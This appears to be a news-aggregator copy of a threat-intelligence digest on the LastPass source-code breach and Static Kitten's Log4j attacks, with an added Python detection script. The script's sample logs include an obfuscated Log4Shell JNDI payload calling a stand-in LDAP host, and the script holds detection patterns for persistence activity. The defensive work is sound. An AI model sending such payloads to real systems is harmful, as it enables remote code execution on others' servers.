One Article Review

Source: Anomali
Identifier: 6626943
Publication date: 2022-08-30 15:01:00 (viewed: 2022-08-30 15:07:05)
Title: Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More
Text: The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

LastPass Hackers Stole Source Code (published: August 26, 2022)

In August 2022, an unidentified threat actor gained access to portions of the development environment of the password management giant LastPass. LastPass stated that the intrusion came through a single compromised developer account and that the attacker took portions of source code and some proprietary LastPass technical information. The company claims that the incident did not affect customer data or encrypted password vaults.

Analyst Comment: This incident does not seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment, since "white-box" attacks (where the attacker knows the source code of the targeted system) are easier for threat actors. Organizations providing public-facing software should take maximum measures to keep threat actors out of their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development.

Tags: LastPass, Password manager, Data breach, Source code

Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli Organizations (published: August 25, 2022)

Starting in July 2022, a new campaign by the Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers found that the campaign exploited the Log4j 2 vulnerabilities CVE-2021-44228 and CVE-2021-45046 in SysAid applications (IT management tools). For persistence, Static Kitten dropped web shells, created local administrator accounts, stole credentials, and added its tools to startup folders and autostart extensibility point (ASEP) registry keys. Overall, the group relied heavily on open-source and built-in operating system tools: eHorus remote management software, the Ligolo reverse tunneling tool, the Mimikatz credential theft tool, PowerShell scripts, the RemCom remote service, the Venom proxy tool, and Windows Management Instrumentation (WMI).

Analyst Comment: Network defenders should monitor for alerts related to web shells, suspicious RDP sessions, ASEP registry anomalies, and suspicious account creation. SysAid users in particular can monitor for web shells and abnormal child processes of the SysAidServer instance. Even though Static Kitten was observed exploiting Log4Shell in the past (targeting VMware applications), most of its attacks still start with spearphishing, often from a compromised email account.

MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 |
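As an added example (not code from Anomali, Microsoft, or SysAid), the Python below turns the analyst comment into four concrete detections and runs them over constructed sample log lines: a Log4Shell JNDI lookup in a web access log, including the nested `${lower:...}` and `${...:-x}` obfuscations attackers use to dodge naive `${jndi:` string matching; a local account creation (Windows event 4720); a member added to the local Administrators group (event 4732); and a write to an ASEP `Run` key (event 4657). The flattened `key=value` event format, host names, IP addresses, and user names are assumptions made for the example; real SIEM field names will differ.

```python
"""Toy detections for the Static Kitten persistence tradecraft described above.
Sample input is constructed for this example and is not from any real incident."""
import re
from typing import Dict, List

# Constructed sample log lines (assumed formats). Lines 1-2: web access log for a
# hypothetical SysAid host. Lines 3-5: Windows Security events flattened to
# key=value pairs, as a log forwarder might emit them.
SAMPLE_LOGS = [
    '10.0.0.5 - - [25/Jul/2022:10:12:01 +0300] "GET /sysaid/index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [25/Jul/2022:10:12:03 +0300] "GET /sysaid/index.jsp HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"',
    'EventID=4720 SubjectUserName=SYSAID$ TargetUserName=support Computer=SYSAID01',
    'EventID=4732 SubjectUserName=SYSAID$ MemberName=support TargetUserName=Administrators Computer=SYSAID01',
    r'EventID=4657 SubjectUserName=support ObjectName=\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ObjectValueName=Updater NewValue=C:\Users\Public\update.exe Computer=SYSAID01',
]

# ${lower:x} / ${upper:x} collapse to x; ${anything:-x} (the default-value form,
# e.g. ${::-j} or ${env:NOPE:-j}) collapses to x. Innermost lookups contain no
# nested "${", so the character class [^${}] selects them first.
_CASE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi:[^}]*\}?', re.IGNORECASE)

# Registry paths treated as autostart extensibility points (ASEP) for this example.
_ASEP_KEYS = ('\\CurrentVersion\\Run', '\\CurrentVersion\\RunOnce', '\\Winlogon')


def normalize_lookups(s: str) -> str:
    """Repeatedly collapse nested Log4j lookups until the string stops changing,
    so an obfuscated payload exposes a plain ${jndi:...} for matching."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE.sub(r'\1', s)
        s = _DEFAULT.sub(r'\1', s)
    return s


def _kv(line: str) -> Dict[str, str]:
    """Split 'Key=Value Key=Value' into a dict (values here contain no spaces)."""
    return dict(tok.split('=', 1) for tok in line.split() if '=' in tok)


def analyze(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per matching line: rule name, 1-based line number, detail."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        if line.startswith('EventID='):
            ev = _kv(line)
            eid = ev.get('EventID')
            host = ev.get('Computer')
            if eid == '4720':  # a user account was created
                findings.append(dict(line=n, rule='local-account-created',
                                     detail=f"{ev.get('TargetUserName')} created by {ev.get('SubjectUserName')} on {host}"))
            elif eid == '4732' and ev.get('TargetUserName', '').lower() == 'administrators':
                findings.append(dict(line=n, rule='added-to-local-admins',
                                     detail=f"{ev.get('MemberName')} added by {ev.get('SubjectUserName')} on {host}"))
            elif eid == '4657' and any(k.lower() in ev.get('ObjectName', '').lower() for k in _ASEP_KEYS):
                findings.append(dict(line=n, rule='asep-registry-write',
                                     detail=f"{ev.get('ObjectValueName')} = {ev.get('NewValue')} on {host}"))
        else:
            m = _JNDI.search(normalize_lookups(line))
            if m:
                findings.append(dict(line=n, rule='log4shell-jndi-lookup', detail=m.group(0)))
    return findings


if __name__ == '__main__':
    for f in analyze(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['rule']}: {f['detail']}")
```

The normalization step is the part worth keeping: a rule that only matches the literal string `${jndi:` misses `${${lower:j}ndi:...}` and `${${::-j}${::-n}${::-d}${::-i}:...}`, both of which Log4j 2 resolves to the same lookup. The Windows rules are deliberately broad; in production they would be narrowed by excluding known provisioning accounts and by correlating the 4720 and 4732 events on the same host within a short window.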
Tags: Ransomware, Hack Tool, Vulnerability, Threat, Guideline, Cloud
Stories: APT 37, APT 29, LastPass


The article does not appear to have been picked up after its publication.


The article does not appear to be a repost of an earlier one.